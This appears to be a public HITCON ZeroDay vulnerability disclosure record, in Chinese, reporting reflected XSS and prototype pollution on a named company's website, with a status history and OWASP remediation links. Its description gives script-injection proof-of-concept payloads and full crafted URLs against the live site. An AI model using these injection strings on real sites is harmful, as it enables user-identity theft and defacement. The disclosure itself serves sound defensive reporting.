Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2021-00426
- Vendor: 沃肯科技有限公司
- Title: 沃肯科技有限公司 網站存在 Reflected XSS 及原型污染
- Introduction: 搜尋欄及網址參數存在 Reflected XSS 及存在原型污染
處理狀態
目前狀態
-
新提交
-
已審核
-
已通報
-
未回報修補狀況
-
未複測
-
公開
處理歷程
- 2021/07/21 15:11:52 : 新提交 (由 BTtea 更新此狀態)
- 2021/07/21 23:23:42 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2021/07/23 12:29:52 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2021/07/23 12:29:52 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2021/07/23 12:29:52 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2021/09/20 03:00:05 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2021-00426
- 通報者:blacktea_player (BTtea)
- 風險:低
- 類型:反射型跨站腳本攻擊 (Reflected Cross-Site Scripting)
參考資料
漏洞說明: OWASP - Cross-site Scripting (XSS)
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
防護原則: OWASP - XSS (Cross Site Scripting) Prevention Cheat Sheet
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
防禦繞過方式: OWASP - XSS Filter Evasion Cheat Sheet
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
相關網址
https://www.woken.com.tw/product.php?page=Product&t=Amplifier
敘述
在 https://www.woken.com.tw/index.php 搜尋框輸入html語法 "><script>alert('xss test')</script>
最終網址為 https://www.woken.com.tw/products.php?page=search&search="><script>alert('xss test')</script>
還有一個網址上的一個參數 t 也輸入html語法 "><script>alert(1)</script>
最終網址為 https://www.woken.com.tw/product.php?page=Product&t="><script>alert(1)</script>
還有一個原型污染,打開瀏覽器主控台測試
jquery 版本過舊,如有其他js版本過舊,建議都更新
當前版本相關CVE
https://snyk.io/vuln/npm:[email protected]
修補建議
攻擊者可經由該漏洞竊取使用者身份,或進行掛碼、轉址等攻擊行為。
漏洞說明: OWASP - Cross-site Scripting (XSS)
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
防護原則: OWASP - XSS (Cross Site Scripting) Prevention Cheat Sheet
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
防禦繞過方式: OWASP - XSS Filter Evasion Cheat Sheet
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet